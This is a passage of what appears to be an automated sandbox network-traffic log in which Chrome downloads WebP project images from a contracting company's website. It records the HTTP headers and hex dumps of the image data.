                                              Data Ascii: QB*~F7PJ9u?X_SNi&=j>p[LvoW.gv:AS!%m(Rf4FpRq/#z0hqQDg[7n|iE`eew*,8X8rOKFF=wS5&Ip@$-jCI(,*Bvj $RvZ=%s\"
                                              2024-09-27 06:20:20 UTC213INData Raw: c8 7d bd 48 09 b7 06 b8 21 ef 9b 6e 8c c8 83 ed bf 5c a5 9f c3 40 80 d4 9a b6 f9 ff 84 e2 31 49 88 9a b0 0f 49 b6 d8 c3 bf e0 44 84 a5 24 01 ba be f2 54 82 ab 0b 78 5c 0f d9 59 76 ad ce 64 92 c5 29 a3 83 cf b3 e4 e4 89 2b 08 30 3a 56 db 9f 3d 03 13 8d 54 9a 3d 26 29 26 91 09 64 46 49 87 fd 44 ca 17 bc c1 88 6f bd 07 cd 77 50 25 f6 13 13 44 4e 70 53 7a 97 b5 4c c3 bf e4 89 40 00 50 53 41 49 4e 00 00 00 38 42 49 4d 03 ed 00 00 00 00 00 10 00 48 00 00 00 01 00 02 00 48 00 00 00 01 00 02 38 42 49 4d 04 28 00 00 00 00 00 0c 00 00 00 02 3f f0 00 00 00 00 00 00 38 42 49 4d 04 43 00 00 00 00 00 0e 50 62 65 57 01 10 00 06 00 2a 00 00 00 00
                                              Data Ascii: }H!n\@1IID$Tx\Yvd)+0:V=T=&)&dFIDowP%DNpSzL@PSAIN8BIMHH8BIM(?8BIMCPbeW*


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              119192.168.2.465457173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:20 UTC465OUTGET /uploads/projects/18/d4358b3300881d66d5be0da1f9c2ed79.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:20 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:20 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 11:25:46 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 44502
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:20 UTC7931INData Raw: 52 49 46 46 ce ad 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 5a ad 00 00 f0 9c 04 9d 01 2a cf 04 a3 03 3e e9 70 b2 52 a9 26 aa 2f a4 d1 7a 61 f0 1d 09 65 6e d8 31 03 d1 e6 52 b2 ff c3 c9 cd 7d b9 f2 73 7a ea 41 9b cb 79 2a 74 cc 8b d9 97 e3 1f b6 87 e6 9d 4c 92 b7 5c 85 fe 7a 72 71 df 1e 7f df 7a fd 67 c7 e1 38 77 7f 63 97 dd bf 7e ba bf aa f4 34 5e 5a 5f 1c fd 37 ff 27 9e 4f a1 ff 85 e1 2f e7 7e f8 db 69 e1 8f e4 bc 1a fe c7 fd 77 ff 9f f1 fd af ff 8d e3 4f ce 29 9d ef 2a d9 7f e5 fa 19 7b bb ef ff a4 9f fd 7a 5b fe 3f ff 3f 57 bf fb 3d 79 f4 1c fe 3f 44 4f fe 9f be 7e d3 95 aa 44 80 a6 ba 40 53 5d 20 29 ae 90 14 d7 48 0a 6b a4 05 35 e0 44 c6 ba 40 53 5d 20 29 ae 90 14 d7 48 0a 6b a4 0a b3 8d 74 80 a6 ba 40 53 5d
                                              Data Ascii: RIFFWEBPVP8XVP8 Z*>pR&/zaen1R}szAy*tL\zrqzg8wc~4^Z_7'O/~iwO)*{z[??W=y?DO~D@S] )Hk5D@S] )Hkt@S]
                                              2024-09-27 06:20:20 UTC8000INData Raw: d4 fd 39 3f 23 f6 94 2d 3c 56 f6 9c 8d c5 c6 b4 7b e5 c6 be dd e0 22 a6 fa 73 13 63 a1 9a e4 d4 f8 ab c6 e0 ee e1 3a 4e fb 5d 6a ec 93 d2 f3 5b 6a e7 5d 45 b2 9b 3e 37 cb 25 89 63 a4 14 93 7a a0 a6 44 1d 47 a0 d8 2d cf 9d 51 d0 95 4f e6 d9 ca d1 08 21 d7 ee 45 ce 4c e6 6e eb 14 12 7d 10 9d a2 eb c6 81 57 45 46 a0 64 95 fe 79 e4 df 74 d5 3a 86 b0 cd ad c8 45 56 67 17 53 8d 6a f5 1a 1e 91 22 fb a0 84 16 4f c3 b3 f2 b3 8e c5 5d 2d f7 a0 0c 8a ef 20 ff bd 06 b2 09 8f 51 15 c0 2e 65 8f 74 b7 d6 9d 32 86 10 f4 60 7d 05 43 91 30 1e 97 94 58 4e ef 0f 5e e4 22 d9 54 20 c0 d2 41 10 4d 6f 58 42 c7 16 f3 95 1d 33 64 6c 47 76 ba 8c b5 ec 2c 2f ca 8b 68 3f ff f1 03 ff 01 d5 97 d0 50 09 fa 49 97 b8 80 93 ad a1 bc 23 95 7c 2d ce 5f ab 90 fc f2 45 2d ef 61 b3 4e 9c 6e 5f
                                              Data Ascii: 9?#-<V{"sc:N]j[j]E>7%czDG-QO!ELn}WEFdyt:EVgSj"O]- Q.et2`}C0XN^"T AMoXB3dlGv,/h?PI#|-_E-aNn_
                                              2024-09-27 06:20:20 UTC8000INData Raw: c3 b3 84 ea f0 e3 6e 2e 04 9f a1 01 44 bf ae c8 c0 4e 41 b0 a5 f5 ae c4 c8 de c0 49 bc ca d6 2a 26 1e 43 ff ed 3c a5 42 b1 b4 53 f5 d3 36 ec c1 25 98 cc e8 6e 3b 1b b7 f7 d3 1d c8 ed ad 72 8d 70 4a 4a 01 a5 44 5a 07 fb 18 6c cf 5a cd a9 6b 28 d1 f3 5c 04 58 ea 23 c7 f4 03 b7 d6 00 10 13 5d 7d c6 5f e8 c3 a8 87 ae a4 b7 37 77 37 4e fb 38 63 37 47 64 88 0b 20 e4 2b 70 13 cd 01 92 ce 0b 17 f5 b6 ec 69 f2 e8 cf b3 ef 79 cd 2a 3f cd c1 2e d8 a6 07 ba a1 ee 7a a1 42 b6 56 0f 2e 53 51 a7 50 56 4c 44 ec 89 72 3b 60 aa 4c 1a ba 72 d9 8e 59 82 cf b9 05 8c 2c 25 67 86 fc 59 d5 db f9 96 2c e7 1e 3e 98 2b 43 90 ae 62 8b 03 8f 72 6a e5 76 4d b0 ab 3c a5 22 41 f2 aa a8 0d bc bf d5 35 2e 79 27 4e 03 9d 34 2a 52 df 2d d8 79 0d 44 08 02 01 e7 60 c2 01 4c 91 66 26 d9 35 41
                                              Data Ascii: n.DNAI*&C<BS6%n;rpJJDZlZk(\X#]}_7w7N8c7Gd +piy*?.zBV.SQPVLDr;`LrY,%gY,>+CbrjvM<"A5.y'N4*R-yD`Lf&5A
                                              2024-09-27 06:20:20 UTC8000INData Raw: 74 ec cf d8 3b 3c 28 1a 3d 5b be 93 1e 4f bb 51 47 ba 06 9f 7d 20 1d f9 e0 64 77 55 7b af 78 29 45 c9 f8 14 60 be 35 c0 d7 dc 68 cb 0c 7a a6 83 ed ec fa 25 2b a0 b2 52 ba 99 5d 26 f1 d4 0b 30 44 95 a8 cf 98 c8 c3 f3 b2 4d d7 3c 35 a7 57 64 8c 54 09 e2 1e 1b b4 13 8c 78 1c 23 34 6c 45 08 54 d7 25 80 ee a9 51 84 36 b2 ee bc 19 50 52 8a 1a 98 70 0f a2 29 43 18 cb de 7a 16 f8 61 cd 70 f3 8c b9 dd d9 2e 75 89 f3 0d 61 60 fc ba a3 67 2b ab b9 0c 77 09 3f e3 c5 91 b5 72 3f aa 53 89 26 87 74 a6 5b 23 ee 9b 67 aa 0f 17 de cb 29 aa 22 30 28 63 52 cb f7 57 2b 07 55 c6 a2 e4 ae 02 81 ef c0 f7 63 b4 00 bb 24 55 d9 fd 4b b2 93 e3 6c 32 f7 c4 61 c7 29 16 c0 02 ff 36 76 82 ea af 8a bd 8e f6 d0 df 5e d3 67 11 a6 32 da 9e 7c ad 05 c0 71 67 53 1d 3f 28 f9 95 2a 81 92 2d b8
                                              Data Ascii: t;<(=[OQG} dwU{x)E`5hz%+R]&0DM<5WdTx#4lET%Q6PRp)Czap.ua`g+w?r?S&t[#g)"0(cRW+Uc$UKl2a)6v^g2|qgS?(*-
                                              2024-09-27 06:20:20 UTC8000INData Raw: 98 b3 47 40 70 6f 69 4c 2b 1c 62 9c 06 33 fd b2 dc 68 d1 d0 8a 66 0d 4b 52 1f 06 7e 7a bc bf f3 e8 8c 81 da 65 ea b3 b5 6b d1 da 02 da bb f5 98 eb b4 ce 22 88 ac 43 e6 ca 95 4d 7d 8c 67 bc 9e 3e 4d a1 d3 36 62 d4 ba ef 66 76 72 ed 71 58 f7 4f 72 9c e0 2c 10 cb 69 a7 5a 87 5f 7f 7f 3a f1 d8 aa a0 99 dc 32 fb fe c1 39 a4 16 d7 4e 27 0d 17 6b a0 0f ae 1d 5b 67 37 bf 77 23 33 4e 87 52 8e e6 79 83 33 f1 e4 70 f1 b5 7f 58 fa 35 ea 2d 67 ac 1f a1 1a 3a f8 93 68 93 e7 44 17 be 3b 69 23 03 0a 7d dd 23 df 4a 35 85 44 de 33 ee cc ed 86 4a d1 a3 2c ad 6d f2 95 c2 35 82 cd 8c 9e d6 aa e6 6d 01 f2 dd 1d 61 1e 16 99 4d 6c 88 ae 86 a3 4e b8 1b 8c 91 96 3f aa 9e cd 7f 60 5d 00 bd 51 7d ba ea 01 bd 2f aa fc be 58 0e bb f0 30 eb 40 d0 fd 9d 13 4c 03 09 30 06 02 1d 39 ea 6e
                                              Data Ascii: G@poiL+b3hfKR~zek"CM}g>M6bfvrqXOr,iZ_:29N'k[g7w#3NRy3pX5-g:hD;i#}#J5D3J,m5maMlN?`]Q}/X0@L09n
                                              2024-09-27 06:20:20 UTC4571INData Raw: 41 24 cb 19 34 f6 00 d3 0a db 7e c8 f0 3c 36 bc 2c 09 c7 08 a3 e7 2c d0 49 c0 48 87 1c c5 d5 f1 19 13 09 ed dd b7 39 35 3c cc 3f 3e f0 2c 53 1d 2a 52 28 cb 54 d2 2a 0d 44 9d 65 57 6e a2 91 ea a6 c5 0b 01 4e 8d 49 38 96 66 bf f9 22 b8 17 62 4f 87 91 ee 96 6a 08 4c c5 70 c1 3e 56 b7 02 96 82 2c a3 1c 47 14 22 e4 16 5f b9 c3 c8 ea ef c6 07 db 6f 15 15 50 d0 b2 93 fa 20 d4 4b 4d 49 9a ec 41 99 c3 2d 3b 37 25 9e b7 cf 3a d4 67 0e dc df ab 52 e7 db e6 f3 71 2b f6 bd b9 10 d8 e1 85 ac 90 95 f3 ad d3 7e 55 15 01 00 20 a0 70 22 00 b9 3e 11 8d 4d ce f5 a2 ea 27 e3 25 c6 08 87 86 7b 19 44 e7 08 30 eb 53 4a 95 af d3 75 cf 5b b6 b2 88 91 c3 1f 64 b0 8c f1 cb ff db 93 79 52 0e 96 2d fe 9e 75 85 f1 17 2a 14 9f a6 ee 33 ae 45 4f ba bc 52 ff ad 87 af 93 f7 ba 50 12 52 6e
                                              Data Ascii: A$4~<6,,IH95<?>,S*R(T*DeWnNI8f"bOjLp>V,G"_oP KMIA-;7%:gRq+~U p">M'%{D0SJu[dyR-u*3EORPRn


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              120192.168.2.465454173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:20 UTC465OUTGET /uploads/projects/14/9c27c5ed5390bcab73619e4cc9ae7362.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:20 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:20 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 10:32:40 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 40342
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:20 UTC7931INData Raw: 52 49 46 46 8e 9d 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 1a 9d 00 00 f0 fe 03 9d 01 2a cf 04 a3 03 3e e9 74 b2 53 29 26 a5 30 23 12 79 fa 00 1d 09 69 6d c4 dd 5d 1f 8d ff f3 40 ff cf ff ed 9e 5f 1f fe ac e4 1e 5b 96 57 fc 7c 7b 39 b8 fa 85 f8 f7 3b bf ff fd 40 e7 0a 6a e6 fa b9 bd 8a fc 27 fa 5f d5 f4 a7 bf bf e5 73 82 f8 13 37 fc 76 ba 70 ee 3a f1 a0 38 8a 23 7b f1 29 4f ff ad 8e a3 df 51 86 0d ff f4 7f f3 ff be 69 fd ab cb 57 d6 ff ca ff eb dd 2b f5 5f f7 7f ae f7 81 ff 93 3c 7f 81 ff af 8f 4f ec 19 fb ed 67 f6 4f ea f9 4b bf b3 bd eb 5f f3 29 f8 13 3b bf f1 f4 5f fc fd 93 bf ba f4 51 7f f7 e9 a3 ef 7f 4e 91 94 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                              Data Ascii: RIFFWEBPVP8XVP8 *>tS)&0#yim]@_[W|{9;@j'_s7vp:8#{)OQiW+_<OgOK_);_QN
                                              2024-09-27 06:20:20 UTC8000INData Raw: 71 b4 ac b2 d9 e0 3a 42 d2 50 ab c9 90 26 1f 3b e0 c2 8a 52 73 ca 39 63 6c a0 5e 05 0e e3 26 7e 19 1b 16 b8 cf b7 ff b9 ba 55 e9 9c 65 1c a0 04 73 b6 12 63 86 ac 0d c6 e5 08 5b e4 ad 3a 45 c8 44 52 b1 7c 46 30 f5 e1 26 0b 4b 98 59 4b ca ff f1 e0 86 dc 90 05 a4 e1 a4 7b 13 ba 8a c5 bc 80 c4 b2 f5 a0 f7 96 3d 57 a0 60 83 d2 0f e8 1f c1 be 3f b4 76 3b 13 bc 36 53 0e e6 90 57 d7 1f 5c 70 6d 63 dd 33 4f 8c a5 a7 ad d3 bb c6 24 0e 62 e9 89 43 b4 3e 73 c8 11 08 d2 4f d3 fe 5e 58 2d 9d eb ce 7e eb 54 c5 56 cb 8a 6d 43 6b 2a 8f 44 76 39 02 32 44 c1 e6 68 50 79 d2 85 ed d3 fc 31 3b e5 bd 2c 73 0b 03 d8 6b 4e 91 e1 54 4e 13 28 00 3d 78 aa bf 1b 13 bb d4 74 66 92 47 65 56 11 62 b2 51 a2 e1 af 96 d7 cb 98 95 9b ff 5a 1e 0d be 15 55 71 3b 61 9e 95 b7 24 63 f9 f8 24 84
                                              Data Ascii: q:BP&;Rs9cl^&~Uesc[:EDR|F0&KYK{=W`?v;6SW\pmc3O$bC>sO^X-~TVmCk*Dv92DhPy1;,skNTN(=xtfGeVbQZUq;a$c$
                                              2024-09-27 06:20:21 UTC8000INData Raw: 79 f3 be dd 63 48 f0 4a 30 44 e2 89 af b6 f3 00 b6 dd 1f a2 86 77 4f ec d1 ed b5 e1 9e 70 f5 22 d4 a0 8a 81 10 83 bc 7c 84 d4 8d 70 40 bf 47 5d f5 30 01 b7 5d 26 4a 0c c6 84 98 dc 2b 4a e4 c4 b5 94 f2 d9 df d8 56 91 f9 7a 38 76 4a de a0 d5 c9 4d 7b 02 42 c0 30 11 0b 43 f2 c7 d8 6c a4 c6 a8 5f 19 5e 60 3f 6c e4 10 b4 de 28 51 87 a7 60 8e d2 08 6d 94 fc 6c b3 8e f6 11 29 6f 06 42 76 cb 78 bd 23 bb d6 4b d5 ad a4 47 a3 5c a5 ed 7c 2b a5 68 02 fc 5a e1 40 4a 7e 4e 28 7b f5 ba 9c aa d4 e6 e8 d2 6c 68 e2 46 1b 4a db 7c ad 9c d8 5f 92 08 c0 c9 43 66 21 eb e7 05 fd 37 ac fe 06 2e 92 0f dd 8c 8a 49 62 94 35 f1 94 ab d6 4c 3d 8e d0 fb 92 24 7d 0e 58 80 4b d5 4d 3e 44 a9 c6 bc 46 c5 db 17 fd 33 c4 c8 61 1e a3 c8 ab 55 c8 34 ce dc d6 23 b5 a7 59 e5 e8 ae 4a f7 2f 42
                                              Data Ascii: ycHJ0DwOp"|p@G]0]&J+JVz8vJM{B0Cl_^`?l(Q`ml)oBvx#KG\|+hZ@J~N({lhFJ|_Cf!7.Ib5L=$}XKM>DF3aU4#YJ/B
                                              2024-09-27 06:20:21 UTC8000INData Raw: 08 09 49 07 20 ce 91 08 5b d4 67 80 b6 d4 d2 f5 a9 e9 88 43 98 24 bd e4 42 47 63 7e 29 ea 55 ae 7e 3b 96 7f c4 1f a7 51 71 6a 03 8b 16 b0 ac 65 b7 4e ec 4c 71 38 9f 51 b6 a1 9f 3d a8 12 ec 3c 34 57 41 f1 ee b2 d2 a9 77 3b 11 64 a7 a1 37 f6 fa f4 fa c9 75 97 55 a0 0c 83 45 57 30 17 0a 9d d7 bd 87 f5 75 c6 a1 ad f1 e7 94 dd f8 74 93 63 bf 40 25 0f c1 3d de 72 59 4d ea 83 5f eb b2 5b 16 b3 d1 83 90 2d 0f 41 ba 79 32 54 12 1c 2e ea 30 90 58 fe fa 2b 93 49 ca 10 39 56 43 d3 a4 cf 6f 46 2c 11 67 83 39 df ad d9 31 c3 26 0a a5 7d 50 52 fd c5 45 f6 25 f8 4b 81 d9 f3 2c e6 ed 62 b3 36 fb 99 99 00 07 24 2c 05 0e d9 96 17 89 57 2a 75 72 47 3a 9f 2c 90 05 24 32 2d b1 17 36 9d 8b d2 95 4b 12 f6 0c d1 87 a1 e9 a7 22 5b 97 09 8b 70 98 8c ee 9c 30 25 9d 26 76 4b 94 42 fe
                                              Data Ascii: I [gC$BGc~)U~;QqjeNLq8Q=<4WAw;d7uUEW0utc@%=rYM_[-Ay2T.0X+I9VCoF,g91&}PRE%K,b6$,W*urG:,$2-6K"[p0%&vKB
                                              2024-09-27 06:20:21 UTC8000INData Raw: 5d 14 36 e5 af 45 7c 91 a9 7c 79 f3 8a 02 ec 5b 56 e8 c0 2b 5d 66 a9 bb b7 71 74 af 35 f3 d3 bf 6d a0 b1 b1 a1 3b 9e 0f 28 de c7 d4 3f ca c9 88 3d 0e 36 ad b5 a3 d0 66 77 3a 8e 7c 65 ea 8c 20 cb 0e f6 7b 92 f1 aa ac 94 b4 18 0d 3e 14 5b e2 37 df 49 f0 fb 1e 74 6f c2 4e ad 80 f9 d2 36 89 63 da 16 b3 bb 37 e8 d7 7a 2f 36 64 d5 48 fd 2e 6a 98 2d 2f 68 3b b1 b6 7a e5 b2 bb a6 3b 90 88 b7 1d 75 73 4e fd 47 8d c0 f0 c5 81 c3 a4 98 c0 f9 c9 7d df cb e4 bb 27 09 4e f8 c5 df 31 78 8c 7c f4 04 2f e1 cb 58 71 ca 9b 32 a4 8f 73 8b b9 62 a4 dc 2a a1 3a 2d 93 41 94 52 07 14 c2 55 b1 1a 76 0f 37 22 91 20 fd 48 da ff 18 3d 1e 10 52 f2 b9 69 4e dd 48 ed 0c 40 49 8f f1 1a 2e 7e 46 ad 9b a5 e6 3f 60 99 39 5f 4b c1 93 eb d2 f6 3e 58 25 5b 1e 3a 02 cf e0 38 18 5e 5f 2a 15 ca
                                              Data Ascii: ]6E||y[V+]fqt5m;(?=6fw:|e {>[7ItoN6c7z/6dH.j-/h;z;usNG}'N1x|/Xq2sb*:-ARUv7" H=RiNH@I.~F?`9_K>X%[:8^_*
                                              2024-09-27 06:20:21 UTC411INData Raw: 8f c1 02 5c 89 6d 1a 0d 85 bc 64 07 b9 5a 88 85 31 49 21 9e 06 20 f3 08 bb d6 a0 7c e2 01 7d 1b 16 80 87 b1 b1 be 1a f6 d4 5e 82 4a c8 33 8d 4f d1 2a 43 a0 10 c8 9f ce b1 9c 0c 51 c9 9c a9 39 ad 32 03 85 ed c3 72 04 16 f9 4f 09 ed 12 1a ac 9d b8 10 b5 bd ad fe 5d 94 de 00 bb 52 cc 5f f0 20 29 77 ad 62 20 f7 b1 2b eb 11 19 4c 2b 6a 98 e3 98 e8 9d 56 d8 b2 d3 ca 45 79 4f 3e 74 90 3d 6f e4 56 8b 65 ff a9 28 43 d2 9b 32 20 01 d7 aa 54 88 75 4a cc 39 fc a5 37 22 d3 9f f0 09 04 72 8c 02 57 2f 40 41 75 ac 79 35 03 62 a3 8e 57 89 da 39 ed 19 4d 2b 48 87 c4 21 af 0e 53 68 4b 4e cc dd f9 be d1 88 d8 f7 6b 0c c1 7a 60 88 7b 48 09 da 92 e2 89 17 94 f4 75 e8 a2 d1 24 d3 53 1f 5e ed 37 90 ce 8d 01 5c 00 66 18 e4 51 5e 66 d8 00 e3 e3 b2 93 9e bd 01 10 75 58 45 a6 6b c2
                                              Data Ascii: \mdZ1I! |}^J3O*CQ92rO]R_ )wb +L+jVEyO>t=oVe(C2 TuJ97"rW/@Auy5bW9M+H!ShKNkz`{Hu$S^7\fQ^fuXEk


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              121192.168.2.465459173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:20 UTC464OUTGET /uploads/projects/9/da3ea8845675faf87c497231993e7480.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:20 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:20 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Wed, 11 Jan 2023 14:28:53 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 58040
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:20 UTC7931INData Raw: 52 49 46 46 b0 e2 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 3c e2 00 00 b0 b0 04 9d 01 2a cf 04 a3 03 3e e9 6e af 53 29 26 33 bf a3 13 0b 1b f0 1d 09 65 6e 2d b9 5c 5f 72 c7 6b f4 b9 ac ed 5f ec f8 d1 48 d7 a5 f2 9f ff 07 e4 76 77 bf 99 73 bb f1 cd fe 74 76 98 bc 9f 6c 4e d7 ff cd 9e 65 43 aa df f3 7c 55 bd 7b fd 8f b0 1f 95 af fb 3e 14 5e 27 fe c7 b0 7f 97 ef f5 3c f1 e6 d7 e9 49 fb 27 fd 3e 8c 8d c9 91 6c 87 fb ad 1f fb 07 ec 4f fa ff 77 ec af a0 ff 90 e1 d1 fe 7e 74 fd 4f ff 82 f4 f1 f4 2b eb 2f fb 4f 45 5f 9d ae fe 4f f4 2e 9b df 4c 6f 5f fd 2a 1f 98 ff f5 f3 f3 f4 6f f2 3c 27 fc e3 b0 f3 18 ff 59 dd c7 f6 86 77 ff cf f1 1f f6 af e4 7d 06 bd c7 e7 63 1f ae 65 fe 97 a0 ef b6 1f 77 fd 9b f6 01 fc ef fe 1e 96 ff
                                              Data Ascii: RIFFWEBPVP8XVP8 <*>nS)&3en-\_rk_HvwstvlNeC|U{>^'<I'>lOw~tO+/OE_O.Lo_*o<'Yw}cew
                                              2024-09-27 06:20:20 UTC8000INData Raw: 6a 32 00 f2 5b 06 70 25 48 92 d2 ea b6 1b 04 91 b1 47 83 90 73 a9 4b 3c 4a 4c 41 77 0b 54 95 cc ac e6 9c c9 63 ab 84 78 f7 dc c6 ef 63 6d cf 5d a9 8a 0c 5c 78 88 85 50 7b 06 f3 cf b7 9c 68 1f be bd c5 ac e5 f1 98 94 31 92 cb af 46 40 06 ac 91 ed ab 0e 75 3a b7 4c 22 eb 3f 2b 94 8e 9d 1b 32 f8 37 c1 67 2a 73 57 1a d4 98 7a b4 b7 6f be 3a 33 d8 78 2f dd b4 23 c8 b9 cb 4e 40 50 8c 3b b9 86 18 0f 44 52 39 fb ac 7e a2 db 9b 38 99 37 a0 4c d4 a4 ae 80 fe 00 43 36 4d d4 29 f4 76 ba 6a b8 89 33 3d eb 3d 71 df 15 26 66 57 9b b5 a2 9c 3f 7a 37 50 8d d8 e1 e0 16 18 10 5b 73 98 bd 93 3a 6b de 21 db ed 57 bf 24 62 0d b6 85 91 06 96 4b 16 cb b6 90 d3 be c0 fb fd 48 92 44 5f a6 e6 63 50 52 f8 12 f9 01 c5 2d 68 d0 f1 83 a9 6f eb e7 e1 c8 a0 ca 88 44 4d 2a 21 a4 a0 d0 97
                                              Data Ascii: j2[p%HGsK<JLAwTcxcm]\xP{h1F@u:L"?+27g*sWzo:3x/#N@P;DR9~87LC6M)vj3==q&fW?z7P[s:k!W$bKHD_cPR-hoDM*!
                                              2024-09-27 06:20:21 UTC8000INData Raw: a1 6f 83 37 9e 48 de 73 96 ed 0c e5 77 ca 5c ce 00 64 0d 30 ce 0b 6d 8f b7 86 c6 c3 5a 5f 49 68 6c ca 79 75 0f cb a0 7a 00 45 1c 1b d6 c8 9c 91 e9 67 e2 80 49 cb 24 80 48 1a 4e e0 90 73 22 71 8c 0d 16 76 0b 50 ce 67 fd ab f2 a0 41 e2 22 01 6f 24 ff 1c f7 fa ad 55 67 6e 47 b1 28 f4 61 1a 0c b0 6d d7 f8 14 9c ae 4c 4a 14 a1 e9 23 5f 35 cf 99 2d fe 28 99 b3 89 fc b6 7e f0 9a 27 12 e8 60 1b 32 86 e3 4a 97 c6 ff 6f cf fc 52 63 33 ca 97 04 51 c5 a8 3c 8a 3a 04 ee 1a 8f c5 a2 5b 5a b6 4a 48 ff 0a 58 4a 69 6c 3a f9 88 b8 23 8f 90 13 41 e6 bd d6 66 dc 4f de 02 73 1d ac 7d 1d 11 95 49 e7 eb 52 8f 04 5a b4 fe a8 89 b7 43 d7 50 d9 c7 c3 20 3b 15 59 c2 48 ea 3e 5a 8a c3 42 38 37 47 d1 e3 9b 79 18 19 95 60 6f a1 f5 bc 05 b4 96 67 51 5b 00 8e 75 d9 e3 f5 c1 d6 ce e9 03
                                              Data Ascii: o7Hsw\d0mZ_IhlyuzEgI$HNs"qvPgA"o$UgnG(amLJ#_5-(~'`2JoRc3Q<:[ZJHXJil:#AfOs}IRZCP ;YH>ZB87Gy`ogQ[u
                                              2024-09-27 06:20:21 UTC8000INData Raw: b7 6f ad 26 c7 5c cc 45 8e c7 09 c2 15 5a e0 69 5b 4f 04 57 cd be 8c cd 25 f4 e8 4e 56 cc dc 10 3b 5f a8 14 7f 6d 24 65 58 38 f7 64 17 32 ed 17 fa 05 2f 38 e9 27 dc f9 cb 9e 62 0d 31 21 40 37 f8 65 95 61 ef 68 a4 86 2b a9 be a9 44 f0 00 cf 9a fd 06 2a 96 d2 36 71 69 32 86 6f 33 3a 98 06 d3 cb 57 cc 75 33 49 f4 d2 e7 c4 65 fe ff 6d d6 cf e6 77 2d c8 47 6b 0d 54 01 3e 09 1f f1 45 72 60 62 43 6d 20 ad fb ca b2 9f 40 94 a3 ee e9 59 f2 df e4 d7 90 56 c4 48 11 b9 82 70 45 2d 3a ce d9 4c bc 99 13 63 b5 b5 cd 41 8d 55 f6 17 d5 3d c6 b3 c8 56 a0 e3 60 94 e3 5e cc 6c 57 ba 05 02 6a f7 98 38 6e af f5 7b 94 e2 8c 06 0d f9 4b 13 e4 66 a0 28 d8 95 8b ff 19 e0 c3 d2 17 08 c9 8c 1d a1 03 d8 1d a5 8a 24 c4 3b 9b 0a 15 75 d9 d9 1d f7 fe e0 b5 2a ce 17 0b 58 f0 9d ae f3 53
                                              Data Ascii: o&\EZi[OW%NV;_m$eX8d2/8'b1!@7eah+D*6qi2o3:Wu3Iemw-GkT>Er`bCm @YVHpE-:LcAU=V`^lWj8n{Kf($;u*XS
